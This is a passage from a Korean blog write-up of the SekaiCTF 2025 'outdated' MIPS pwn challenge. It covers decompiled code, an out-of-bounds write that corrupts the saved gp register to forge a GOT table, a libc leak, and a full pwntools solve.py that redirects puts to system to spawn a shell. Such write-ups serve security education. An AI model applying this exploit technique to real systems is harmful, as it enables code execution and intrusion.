{"id":3923,"date":"2025-08-18T10:43:32","date_gmt":"2025-08-18T01:43:32","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3923"},"modified":"2025-08-18T10:43:33","modified_gmt":"2025-08-18T01:43:33","slug":"sekaictf2025-outdated-mips","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3923","title":{"rendered":"[SekaiCTF2025] outdated (mips)"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"375\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-1024x375.png\" alt=\"\" class=\"wp-image-3924\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-1024x375.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-300x110.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1-768x281.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-1.png 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">checksec<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@c304d9296d3e:~\/study\/sekai2025\/pwn_outdated$ checksec .\/outdated \n[*] '\/home\/ubuntu\/study\/sekai2025\/pwn_outdated\/outdated'\n    Arch:       mips-32-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>IDA pseudo code<\/li>\n<\/ul>\n\n\n\n<p>\ucf54\ub4dc\ub85c \uc54c\uc544\ubcf4\uae30 \ud798\ub4e4\uae30 \ub54c\ubb38\uc5d0 ghidra\ub97c \ud65c\uc6a9\ud558\uac70\ub098 \uc5b4\uc148\ube14\ub9ac\uc5b4 \ucf54\ub4dc\ub85c \ubcf4\ub294\uac8c \ub0ab\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n  _DWORD v3[8]; \/\/ [sp+0h] [+0h] BYREF\n  unsigned __int16 v4; \/\/ [sp+22h] [+22h]\n  int v5; \/\/ [sp+24h] [+24h]\n  int v6; \/\/ [sp+28h] [+28h]\n  int v7; \/\/ [sp+2Ch] [+2Ch]\n  int v8; \/\/ [sp+30h] [+30h]\n  int v9; \/\/ [sp+34h] [+34h]\n  int v10; \/\/ [sp+38h] [+38h]\n\n  v3[7] = argc;\n  v3[6] = argv;\n  v6 = 6553600;\n  v7 = 19661000;\n  v8 = 32768400;\n  v9 = 45875800;\n  v10 = 87622432;\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  game_name[(_DWORD)&amp;strcspn] = 0;\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  *((_WORD *)&amp;v3[10] + v5) = v4;\n  __asm { sdc2    $25, 0($zero) # why exit here??????????? }\n  __asm { sdc2    $25, 0($zero) }\n  __asm { sdc2    $25, 0($zero) }\n  printf(0, v5, v4, game_name);\n}\n<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ghidra code<\/li>\n<\/ul>\n\n\n\n<p>\uadf8\ub098\ub9c8 \uc54c\uc544\ubcf4\uae30 \uc27d\ub2e4. \ud558\uc9c0\ub9cc \ub9e4\uac1c\ubcc0\uc218\ub294 \uc81c\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uc9c4 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\n\/* WARNING: Globals starting with '_' overlap smaller symbols at the same address *\/\n\nvoid main(void)\n\n{\n  size_t sVar1;\n  ushort local_26;\n  int local_24;\n  undefined4 local_20;\n  undefined4 local_1c;\n  undefined4 local_18;\n  undefined4 local_14;\n  undefined4 local_10;\n  undefined4 local_c;\n  \n  local_c = ___stack_chk_guard;\n  local_20 = uRam000011ac;\n  local_1c = uRam000011b0;\n  local_18 = uRam000011b4;\n  local_14 = uRam000011b8;\n  local_10 = uRam000011bc;\n  puts_blue(0xcf0);\n  puts((char *)0xffc);\n  printf((char *)0x101c,main);\n  puts((char *)0x104c);\n  fgets(game_name,0x60,_stdin);\n  sVar1 = strcspn(game_name,(char *)0x1074);\n  game_name[sVar1] = 0;\n  puts((char *)0x1078);\n  puts(game_name);\n  puts((char *)0x1094);\n  puts((char *)0x10e8);\n  scanf((char *)0x110c,&amp;local_24);\n  puts((char *)0x1114);\n  scanf((char *)0x1144,&amp;local_26);\n  *(ushort *)((int)&amp;local_20 + local_24 * 2) = local_26;\n  printf((char *)0x114c,local_24,(uint)local_26,game_name);\n  puts((char *)0x118c);\n                    \/* WARNING: Subroutine does not return *\/\n  exit(0);\n}\n\n<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Gemini(2.5 Pro) Code (IDA Assembly code \u2192 Gemini)\n<ul class=\"wp-block-list\">\n<li>\uc704 \uc5b4\uc148\ube14\ub9ac \uba85\ub801\uc5b4\ub4e4\uc744 c\uc5b8\uc5b4 \ucf54\ub4dc\ub85c \ubcc0\ud658\ud574\uc918<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p>\ubd84\uc11d\ud558\uae30 \uc88b\ub2e4. \ucde8\uc57d\uc810\uae4c\uc9c0 \uc54c\ub824\uc8fc\ub294 \uc0c1\ud669\uc774\ub2e4.<\/p>\n\n\n\n<p>\ubcf4\ub2e4\uc2dc\ud53c main \ud568\uc218 \uc8fc\uc18c\ub97c \ucd9c\ub825\ud574\uc8fc\uace0, game_name \uc804\uc5ed\ubc30\uc5f4\uc5d0 95\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>level_rewards \uc9c0\uc5ed\ubc30\uc5f4\uc5d0\uc11c OOB write \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud558\uba70, level_index\ub97c \ud1b5\ud574 \uc4f0\uc5ec\uc9c8 \ub300\uc0c1 \uc8fc\uc18c, new_reward\ub85c \uc4f8 \uac12 2\ubc14\uc774\ud2b8\ub97c \uc815\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;string.h>\n\n\/\/ \uc804\uc5ed \ubcc0\uc218 (\uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 dword_11AC \ub4f1\uc5d0\uc11c \ucc38\uc870)\n\/\/ \uc2e4\uc81c \uac12\uc740 \uc54c \uc218 \uc5c6\uc73c\ubbc0\ub85c \uc784\uc758\uc758 \uac12\uc73c\ub85c \ucd08\uae30\ud654\ud569\ub2c8\ub2e4.\nint dword_11AC = 100;\nint dword_11B0 = 200;\nint dword_11B4 = 300;\nint dword_11B8 = 400;\nint dword_11BC = 500;\n\n\/\/ game_name \ubc84\ud37c (fgets\uc5d0\uc11c \uc0ac\uc6a9)\nchar game_name[96];\n\n\/\/ \uc0ac\uc6a9\uc790 \uc815\uc758 \ud568\uc218 \ud504\ub85c\ud1a0\ud0c0\uc785 (\uc5b4\uc148\ube14\ub9ac\uc5d0\uc11c puts_blue\ub85c \ud638\ucd9c\ub428)\nvoid puts_blue(const char *s);\n\nint main(int argc, char *argv[]) {\n    \/\/ \uc2a4\ud0dd \ubcc0\uc218\ub4e4\n    \/\/ \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 var_18 ~ var_8 (20\ubc14\uc774\ud2b8)\uc5d0 \ud574\ub2f9\ud558\uba70\n    \/\/ short \ud0c0\uc785\uc73c\ub85c \uc811\uadfc\ub418\ubbc0\ub85c short \ubc30\uc5f4\ub85c \uc120\uc5b8\ud569\ub2c8\ub2e4.\n    short level_rewards[10];\n    \n    \/\/ var_1C, var_1E\uc5d0 \ud574\ub2f9\n    int level_index;\n    unsigned short new_reward;\n    \n    long stack_canary; \/\/ var_4, \uc2a4\ud0dd \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0 \ubc29\uc5b4 \uba54\ucee4\ub2c8\uc998\n\n    \/\/ \uc2a4\ud0dd \uce74\ub098\ub9ac \uc124\uc815\n    stack_canary = __stack_chk_guard;\n\n    \/\/ \uc804\uc5ed \ubcc0\uc218 \uac12\uc744 \uc2a4\ud0dd\uc758 level_rewards \ubc30\uc5f4\ub85c \ubcf5\uc0ac\n    \/\/ dword_11AC ~ dword_11BC (5\uac1c\uc758 int) \uac12\uc744 \ubcf5\uc0ac\ud569\ub2c8\ub2e4.\n    memcpy(level_rewards, &amp;dword_11AC, 20);\n\n    \/\/ \ud504\ub85c\uadf8\ub7a8 \uc2dc\uc791 \uba54\uc2dc\uc9c0 \ucd9c\ub825\n    puts_blue(\" _______  __   __  _______  ______   __...\");\n    puts(\"Welcome to the Outdated Game!\");\n    printf(\"Here's a little bit of helpful information: %p\\\\n\", main);\n\n    \/\/ \uac8c\uc784 \uc774\ub984 \uc785\ub825\ubc1b\uae30\n    puts(\"What would you like to name your game?\");\n    fgets(game_name, 96, stdin);\n\n    \/\/ fgets\ub85c \uc785\ub825\ubc1b\uc740 \ubb38\uc790\uc5f4\uc758 \ub9c8\uc9c0\ub9c9 \uac1c\ud589\ubb38\uc790(\\\\n) \uc81c\uac70\n    game_name[strcspn(game_name, \"\\\\n\")] = 0;\n\n    \/\/ \uc785\ub825\ubc1b\uc740 \uc774\ub984 \ud655\uc778 \ucd9c\ub825\n    puts(\"Great! Your game is named:\");\n    puts(game_name);\n\n    puts(\"Now, I am feeling generous today, so I'll let you change a reward.\");\n    \n    \/\/ \ubcc0\uacbd\ud560 \ub808\ubca8 \ubc88\ud638 \uc785\ub825\ubc1b\uae30\n    puts(\"Which level do you want to change?\");\n    scanf(\"%d%*c\", &amp;level_index);\n\n    \/\/ \uc124\uc815\ud560 \ubcf4\uc0c1 \uac12 \uc785\ub825\ubc1b\uae30\n    puts(\"What reward do you want to set for this level?\");\n    scanf(\"%hu%*c\", &amp;new_reward);\n\n    \/\/ --- !!! \ucde8\uc57d\uc810 \ubc1c\uc0dd \uc9c0\uc810 !!! ---\n    \/\/ \uc0ac\uc6a9\uc790\uac00 \uc785\ub825\ud55c level_index \uac12\uc5d0 \ub300\ud55c \uac80\uc99d \uc5c6\uc774 \ubc30\uc5f4\uc5d0 \uc811\uadfc\ud558\uc5ec \uac12\uc744 \uc501\ub2c8\ub2e4.\n    \/\/ \ub9cc\uc57d \uc0ac\uc6a9\uc790\uac00 \uc74c\uc218\ub098 \ub9e4\uc6b0 \ud070 \uac12\uc744 \uc785\ub825\ud558\uba74 \uc2a4\ud0dd\uc758 \ub2e4\ub978 \uc911\uc694 \ub370\uc774\ud130\n    \/\/ (\uc608: \uc2a4\ud0dd \uce74\ub098\ub9ac, \ubc18\ud658 \uc8fc\uc18c \ub4f1)\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\uc2b5\ub2c8\ub2e4.\n    level_rewards[level_index] = new_reward;\n\n    \/\/ \uacb0\uacfc \ucd9c\ub825\n    printf(\"You have set the reward for level %d to %hu for game %s\\\\n\", level_index, new_reward, game_name);\n\n    \/\/ \ud504\ub85c\uadf8\ub7a8 \uc885\ub8cc\n    puts(\"Thanks for playing! Come again!\");\n    exit(0);\n}\n\n\/\/ \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc5d0\uc11c 'puts_blue'\ub77c\ub294 \ud568\uc218\ub97c \ud638\ucd9c\ud558\ubbc0\ub85c,\n\/\/ \uc774\ub97c C \ud568\uc218\ub85c \uad6c\ud604\ud574\uc90d\ub2c8\ub2e4. \uc2e4\uc81c \uae30\ub2a5\uc740 \uc54c \uc218 \uc5c6\uc73c\ub098 \uc774\ub984\uc73c\ub85c \ubcf4\uc544\n\/\/ \ud30c\ub780\uc0c9 \uae00\uc528\ub85c \ucd9c\ub825\ud558\ub294 \ud568\uc218\ub85c \ucd94\uc815\ub429\ub2c8\ub2e4.\nvoid puts_blue(const char *s) {\n    \/\/ \uc608\uc2dc: ANSI \uc774\uc2a4\ucf00\uc774\ud504 \ucf54\ub4dc\ub97c \uc0ac\uc6a9\ud558\uc5ec \ud30c\ub780\uc0c9\uc73c\ub85c \ucd9c\ub825\n    printf(\"\\\\033[0;34m\");\n    puts(s);\n    printf(\"\\\\033[0m\");\n}\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>MIPS \ud2b9\uc131\uc0c1 gp\ub77c\ub294 \ub808\uc9c0\uc2a4\ud130\uac00 \uc874\uc7ac\ud558\ub294\ub370, \ud574\ub2f9 \ub808\uc9c0\uc2a4\ud130\uac12\uc744 \uc2a4\ud0dd\uc5d0\uc11c \uac00\uc838\uc628\ub2e4.<\/p>\n\n\n\n<p>printf \uc774\ud6c4 \uc2e4\ud589\ub418\ub294 \ud574\ub2f9 \uc5b4\uc148\ube14\ub9ac\uc5b4\uc5d0\uc11c gp\uac12\uc744 \ub2e4\uc2dc \uc2a4\ud0dd\uc5d0\uc11c \uac00\uc838\uc628\ub2e4.<\/p>\n\n\n\n<p><strong><code>00010bec 10 00 dc 8f lw gp,local_38(s8)<\/code><\/strong><\/p>\n\n\n\n<p>\uc5ec\uae30\uc11c oob write \ucde8\uc57d\uc810\uc73c\ub85c \uc2a4\ud0dd\uc5d0 \uc800\uc7a5\ub41c gp \ud558\uc704 2\ubc14\uc774\ud2b8\uac12\uc744 \uc218\uc815\ud574\uc900\ub2e4. \uc704\uc870\uc2dc\ud0ac got \ud14c\uc774\ube14 \ub370\uc774\ud130\ub97c game_name\uc5d0 \uc4f4 \ub2e4\uc74c \uac00\ub9ac\ud0a4\uac8c \ud558\uba74, GOT \ud14c\uc774\ube14\uc744 \uc704\uc870\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>\ud765\ubbf8\ub85c\uc6b4 \uc810\uc740 GOT \ud14c\uc774\ube14\uc5d0\ub294 \ud568\uc218 \uc8fc\uc18c \ubfd0\ub9cc \uc544\ub2c8\ub77c \ucd9c\ub825\uc2dc\ud0ac &#8220;Thanks for playing! Come again!&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub3c4 \uc800\uc7a5\ud558\uace0 \uc788\ub2e4\ub294 \uc810\uc774\ub2e4.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>ghidra \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc + c\uc5b8\uc5b4 \ucf54\ub4dc \ubd80\uc5f0\uc124\uba85<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">        00010bc0 e8 ff 43 a4     sh         v1,-0x18(v0)\n        00010bc4 24 00 c2 8f     lw         v0,local_24(s8)\n        00010bc8 22 00 c3 97     lhu        v1,local_26(s8)\n        00010bcc 38 80 87 8f     lw         a3=>game_name,-0x7fc8(gp)=>->game_name           = ??\n                                                                                             = 000300c0\n        00010bd0 25 30 60 00     or         a2,v1,zero\n        00010bd4 25 28 40 00     or         a1,v0,zero\n*** printf(\"You have set the reward for level %d to %hu for game %s\\\\n\", level_index, new_reward, game_name); ***\n        00010bd8 30 80 82 8f     lw         v0,-0x7fd0(gp)=>PTR_00030030                     = 00000000\n        00010bdc 4c 11 44 24     addiu      a0,v0,0x114c\n        00010be0 8c 80 82 8f     lw         v0,-0x7f74(gp)=>->&lt;EXTERNAL>::printf             = 00010c20\n        00010be4 25 c8 40 00     or         t9,v0,zero\n        00010be8 00 00 19 f8     jialc      t9=>&lt;EXTERNAL>::printf,0x0                       int printf(char * __format, ...)\n*** puts(\"Thanks for playing! Come again!\"); ***\n        **00010bec 10 00 dc 8f     lw         gp,local_38(s8)**\n        00010bf0 30 80 82 8f     lw         v0,-0x7fd0(gp)=>PTR_00030030                     = 00000000\n        00010bf4 8c 11 44 24     addiu      a0,v0,0x118c\n        **00010bf8 7c 80 82 8f     lw         v0,-0x7f84(gp)=>->&lt;EXTERNAL>::puts               = 00010c40**\n        00010bfc 25 c8 40 00     or         t9,v0,zero\n        00010c00 00 00 19 f8     jialc      t9=>&lt;EXTERNAL>::puts,0x0                         int puts(char * __s)\n*** C CODE: exit(0); ***\n        00010c04 10 00 dc 8f     lw         gp,local_38(s8)\n        00010c08 25 20 00 00     or         a0,zero,zero\n        **00010c0c 54 80 82 8f     lw         v0,-0x7fac(gp)=>->&lt;EXTERNAL>::exit               = 00010c80**\n        00010c10 25 c8 40 00     or         t9,v0,zero\n        **00010c14 00 00 19 f8     jialc      t9=>&lt;EXTERNAL>::exit,0x0**                         void exit(int __status)\n                             -- Flow Override: CALL_RETURN (COMPUTED_CALL_TERMINATOR)\n\n<\/pre>\n\n\n\n<p>\ud544\uc790\ub294 puts \ub300\uc2e0\uc5d0 puts_blue\ub85c, \u201cThanks for playing!\u2026 \u201c \uc8fc\uc18c \ub300\uc2e0\uc5d0 puts@got \uc8fc\uc18c\ub97c \ub123\uc5b4\uc11c libc \uc8fc\uc18c\ub97c \uad6c\ud560 \uc218 \uc788\uc5c8\uace0 exit \ub300\uc2e0\uc5d0 main \ud568\uc218\ub97c \ub123\uc5b4\uc11c \ud55c\ubc88\ub354 main \ud568\uc218\ub97c \ud638\ucd9c\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\ud55c\ubc88\ub354 got \ud14c\uc774\ube14\uc744 \ubcc0\uc870\uc2dc\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\uc774\ubc88\uc5d0\ub294 puts \ub300\uc2e0\uc5d0 system, \u201cThanks for playing!\u2026 \u201c \uc8fc\uc18c \ub300\uc2e0\uc5d0 \/bin\/sh\ub97c \uac00\ub9ac\ud0a4\uac8c \ud558\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"http:\/\/solve.py\">solve.py<\/a><\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\n\nfrom pwn import *\ncontext.log_level = 'debug'\ncontext(arch='mips', os='linux', bits=32, endian='little')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = remote(\"127.0.0.1\", 1337)\n# p = process(\".\/run2_dbg.sh\")\n# p = process(\".\/run2.sh\")\n\n# p = remote(\"host3.dreamhack.games\", 10296)\ne = ELF('.\/outdated',checksec=False)\n# l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\nl = ELF('.\/target\/lib\/libc.so', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nru(b\"Here's a little bit of helpful information:\")\nleak = rl().strip()\nleak = int(leak, 16)\ninfo(f\"leak: {hex(leak)}\")\n\ne.address = leak - e.sym.main\npie_base = e.address\ninfo(f\"pie_base: {hex(e.address)}\")\n\n# pay = p32(e.sym.main + 0x1f0)\n# pay += b\"ABCDEFGHIJKL\"\n# pay += p32(e.sym.exit) + b\"QRSTUVWXYZabcdefghijk;lmnopqrstuvwxyz0123456789\"\n# pay = pay + b\"\\\\x41\"*(0x5f-len(pay))\n\n# guessed_libc_base = pie_base - 0x8f4000 # = 0x3f70c000\n# info(f\"guessed_libc_base: {hex(guessed_libc_base)}\")\n# l.address = guessed_libc_base\n\n# pay = b\"A\"*0x5f\n#fake gp!!!! fake got!!!!\npay = p32(e.got.puts - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(e.sym.puts_blue)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(e.sym.puts_blue)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\n'''\n.got:00020010  # ===========================================================================\n.got:00020010\n.got:00020010  # Segment type: Pure data\n.got:00020010                 .data # .got\n.got:00020010 off_20010:      .word _stdout            # DATA XREF: sub_6F0\u2191o\n.got:00020010                                          # sub_740\u2191o ...\n.got:00020014                 .word 0x80000000\n.got:00020018 _term_proc_ptr: .word _term_proc\n.got:0002001C _init_proc_ptr: .word _init_proc\n.got:00020020 main_ptr:       .word main\n.got:00020024                 .word unk_20004\n.got:00020028 __RLD_MAP_ptr:  .word __RLD_MAP\n.got:0002002C                 .word off_20090\n.got:00020030                 .word _stdout   &lt;- string by puts\n.got:00020034 puts_blue_ptr:  .word puts_blue &lt;- fake gp start !!!!!!!!!!!!!! fake_gp = 0x200c0 \n.got:00020038 game_name_ptr:  .word game_name\n.got:0002003C                 .word _stdout\n.got:00020040                 .word _stdout\n.got:00020044                 .word _stdout\n.got:00020048 __register_frame_info_ptr:.word __register_frame_info\n.got:0002004C __libc_start_main_ptr:.word __libc_start_main\n.got:00020050 setbuf_ptr:     .word setbuf\n.got:00020054 exit_ptr:       .word exit !!!!!!!!!!!!!\n                                        exit \ub300\uc2e0\uc5d0 main \ub4e4\uc5b4\uac00\uac8c \ub9cc\ub4dc\ub294\uac74 \uc26c\uc6c0, \uc790\uccb4\uc801\uc73c\ub85c write\ud558\uba74 \ub418\ub2c8\uae4c ... +0x10\ud558\uba74 _ITM_deregisterTMCloneTable?\n                                        \uc2e4\uc81c\ub85c \uc27d\uc9c0 \uc54a\uc74c;; -0x34 \ub610\ub294 game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30 \uc704\ud574 \ucd5c\uc18c +0x6c \uc774\uc0c1\n.got:00020058 stderr_ptr:     .word stderr\n.got:0002005C scanf_ptr:      .word scanf\n.got:00020060 strcspn_ptr:    .word strcspn\n.got:00020064 _ITM_deregisterTMCloneTable_ptr:.word _ITM_deregisterTMCloneTable \n.got:00020068 stdin_ptr:      .word stdin\n.got:0002006C _ITM_registerTMCloneTable_ptr:.word _ITM_registerTMCloneTable\n.got:00020070 __deregister_frame_info_ptr:.word __deregister_frame_info\n.got:00020074 __stack_chk_fail_ptr:.word __stack_chk_fail\n.got:00020078 __cxa_finalize_ptr:.word __cxa_finalize\n.got:0002007C puts_ptr:       .word puts  !!!!!!!! puts \ub300\uc2e0\uc5d0 main\uc5d0 \ub4e4\uc5b4\uac00\ub824\uba74... -0x5c\ud574\uc11c got\uc758 main \uac00\ub9ac\ud0a4\uac70\ub098, \ub610\ub294 +0x44\ud574\uc11c game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30\n                                            puts \ub300\uc2e0\uc5d0 printf \ub4e4\uc5b4\uac00\ub824\uba74,,,+0x10 \ub354\ud574\uc57c\ud568;; 2007c-0x34 = 20048; __register_frame_info\n                                            puts \ub300\uc2e0\uc5d0 puts_blue \ub4e4\uc5b4\uac00\ub824\uba74, \n.got:00020080 fgets_ptr:      .word fgets   \n.got:00020084 __stack_chk_guard_ptr:.word __stack_chk_guard\n.got:00020088 stdout_ptr:     .word stdout\n.got:0002008C printf_ptr:     .word printf\n.got:0002008C\n.sdata:00020090  # ===========================================================================\n.sdata:00020090\n.sdata:00020090  # Segment type: Pure data\n.sdata:00020090                 .sdata\n.sdata:00020090 off_20090:      .word off_20090          # DATA XREF: sub_7B4+30\u2191o\n.sdata:00020090                                          # sub_7B4+3C\u2191r ...\n.sdata:00020090\nLOAD:00020094  # ===========================================================================\nLOAD:00020094\nLOAD:00020094  # Segment type: Pure data\nLOAD:00020094                 .data # LOAD\nLOAD:00020094                 .align 4\nLOAD:00020094\n.bss:000200A0  # ===========================================================================\n.bss:000200A0\n.bss:000200A0  # Segment type: Uninitialized\n.bss:000200A0                 .bss\n.bss:000200A0 dword_200A0:    .space 4                 # DATA XREF: sub_7B4+20\u2191r\n.bss:000200A0                                          # sub_7B4+70\u2191w\n.bss:000200A4 dword_200A4:    .space 4                 # DATA XREF: sub_838+2C\u2191o\n.bss:000200A8                 .space 4\n.bss:000200AC                 .space 4\n.bss:000200B0                 .space 4\n.bss:000200B4                 .space 4\n.bss:000200B8                 .space 4\n.bss:000200BC                 .space 4\n.bss:000200C0                 .globl game_name\n.bss:000200C0  # _BYTE game_name[96]\n.bss:000200C0 game_name:      .space 0x60              # DATA XREF: LOAD:000003D8\u2191o\n'''\n# ru(\"your game\")\n# rl()\nleak = ru(\".\\\\n\")\nleak = rl()\n# leak = r(4)\nleak = leak[5:5+4]\nleak = uu32(leak)\n# info(f\"leak: {(leak.hex())}\")\ninfo(f\"leak: {(hex(leak))}\")\nl.address = leak - l.sym.puts\n\n#main again\n#fake gp!!!! fake got!!!!\npay = p32(l.address + 0xAAF20 - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(l.sym.system)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(l.sym.system)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\npi()\n<\/pre>\n\n\n\n<h2 